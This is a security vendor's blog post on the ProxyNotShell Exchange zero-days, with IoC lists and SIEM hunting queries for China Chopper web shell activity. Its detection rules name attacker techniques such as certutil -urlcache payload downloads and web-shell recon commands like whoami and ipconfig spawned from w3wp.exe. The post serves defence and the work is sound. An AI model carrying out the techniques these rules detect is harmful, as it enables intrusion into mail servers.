by Bhabesh Raj Rai, Security Research

On September 29, 2022, Microsoft confirmed reports of adversaries exploiting two zero-day vulnerabilities that affect Microsoft Exchange servers: CVE-2022-41040 (CVSSv3 score of 6.3) and CVE-2022-41082(CVSSv3 score of 8.8). The former is a Server-Side Request Forgery (SSRF) vulnerability, while the latter allows remote code execution (RCE) when PowerShell is accessible to the adversary. Adversaries require authenticated access to the Exchange server to exploit both vulnerabilities.

Vietnamese tech company GTSC discovered the use of these flaws back in August and on September 28 released a blog with more details. A day later, Microsoft gave customers detection and mitigation guidance for the threats. Both Microsoft and GTSC observed adversaries installing the popular China Chopper web shell using the attack chain.

The vulnerabilities are very similar to ProxyShell vulnerabilities discovered in 2021. Security researcher Kevin Beaumont has nicknamed them as ProxyNotShell due to their similarity with ProxyShell, with the main difference being that ProxyNotShell requires authentication.

ProxyNotShell fast facts

  • Requires authenticated access to the Exchange server
  • Only affects on-premise Exchange servers (2013/2016/2019)
  • No patch is available at the moment
  • Adversaries are chaining the two zero-days to drop web shells
  • Microsoft observed attacks in fewer than 10 organizations globally

Detect exploitation of ProxyNotShell using Logpoint

Perform IoC sweeps for ProxyNotShell using logs from August onward.

(source_address IN [137.184.67.33, 125.212.220.48, 5.180.61.17, 47.242.39.92, 61.244.94.85, 86.48.6.69, 86.48.12.64, 94.140.8.48, 94.140.8.113, 103.9.76.208, 103.9.76.211, 104.244.79.6, 112.118.48.186, 122.155.174.188, 125.212.241.134, 185.220.101.182, 194.150.167.88, 212.119.34.11, 206.188.196.77]
destination_address IN [137.184.67.33, 125.212.220.48, 5.180.61.17, 47.242.39.92, 61.244.94.85, 86.48.6.69, 86.48.12.64, 94.140.8.48, 94.140.8.113, 103.9.76.208, 103.9.76.211, 104.244.79.6, 112.118.48.186, 122.155.174.188, 125.212.241.134, 185.220.101.182, 194.150.167.88, 212.119.34.11, 206.188.196.77])
(hash IN [c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1, 65a002fe655dc1751add167cf00adf284c080ab2e97cd386881518d3a31d27f5, b5038f1912e7253c7747d2f0fa5310ee8319288f818392298fd92009926268ca, be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257, 074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82, 45c8233236a69a081ee390d4faa253177180b2bd45d8ed08369e07429ffbe0a9, 9ceca98c2b24ee30d64184d9d2470f6f2509ed914dafb87604123057a14c57c0, 29b75f0db3006440651c6342dc3c0672210cfb339141c75e12f6c84d990931c3, c8c907a67955bcdf07dd11d35f2a23498fb5ffe5c6b5d7f36870cf07da47bff2, 76a2f2644cb372f540e179ca2baa110b71de3370bb560aca65dcddbd7da3701e]
OR hash_sha256 IN [c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1, 65a002fe655dc1751add167cf00adf284c080ab2e97cd386881518d3a31d27f5, b5038f1912e7253c7747d2f0fa5310ee8319288f818392298fd92009926268ca, be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257, 074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82, 45c8233236a69a081ee390d4faa253177180b2bd45d8ed08369e07429ffbe0a9, 9ceca98c2b24ee30d64184d9d2470f6f2509ed914dafb87604123057a14c57c0, 29b75f0db3006440651c6342dc3c0672210cfb339141c75e12f6c84d990931c3, c8c907a67955bcdf07dd11d35f2a23498fb5ffe5c6b5d7f36870cf07da47bff2, 76a2f2644cb372f540e179ca2baa110b71de3370bb560aca65dcddbd7da3701e])

Since June 2021, Exchange supports integration with Antimalware Scan Interface (AMSI). We advise Exchange administrators to ensure all updates are installed and AMSI scanning is functional. Admins should also audit if they have placed Exchange directories in AV exclusions for performance reasons.

label=Threat label=Detect 
threat IN ["Backdoor:ASP/Webshell.Y", "Backdoor:Win32/RewriteHttp.A", "Backdoor:JS/SimChocexShell.A!dha", "Behavior:Win32/IISExchgDropWebshell.A!dha", "Behavior:Win32/IISExchgDropWebshell.A", "Trojan:Win32/IISExchgSpawnCMD.A", "Trojan:Win32/WebShellTerminal.A", "Trojan:Win32/WebShellTerminal.B"]

Analysts should look for Chopper web shell artifacts in process creation logs.

label="Process" label=Create
parent_process="*\w3wp.exe" command IN ["*&ipconfig&echo*", "*&quser&echo*", "*&whoami&echo*", "*&c:&echo*", "*&cd&echo*", "*&dir&echo*", "*&echo [E]*", "*&echo [S]*"]

Similarly, we advise analysts to hunt for suspicious child processes of w3wp.exe.

label="Process" label=Create parent_process="*\w3wp.exe"
-process IN ["*\WerFault.exe", "*\csc.exe"]
| chart count() by log_ts, user, "process", parent_command, command

As stated in the GTSC report, attackers have used certutil to download web shells.

label="Process" label=Create process="*\certutil.exe" 
command IN ["* -urlcache *", "* /urlcache *"]

Similarly, hunt for suspicious file creations in PerfLogs or public directories, which attackers commonly use to house downloaded payloads.

norm_id=WindowsSysmon event_id=11
path IN ["C:\Users\Public*", "C:\PerfLogs*", "C:\root*"]

Detections for ProxyShell work for ProxyNotShell too. Customers can use existing ProxyShell alerts bundled in the Logpoint Alert Rules application. As stated in Microsoft’s blog, adversaries used China Chopper web shell to perform AD reconnaissance and the Alert Rules application covers the necessary TTPs.

Apply mitigations without delay

We advise Exchange administrators to assess and apply any of the three mitigation options that Microsoft provided in their customer guidance for ProxyNotShell as soon as possible. Microsoft also released a script to apply the mitigations for the SSRF vector CVE-2022-41040 to affected Exchange servers.

Analysts should monitor for exploitation attempts until Microsoft releases patches for ProxyNotShell. We advise analysts to continually look out for web shells because detecting post-exploitation activity can help uncover zero-day or N-day vulnerabilities.

We will update the blog as the situation evolves.

Contact Logpoint

Contact us and learn why
industry-leading companies
choose Logpoint:

Contact Logpoint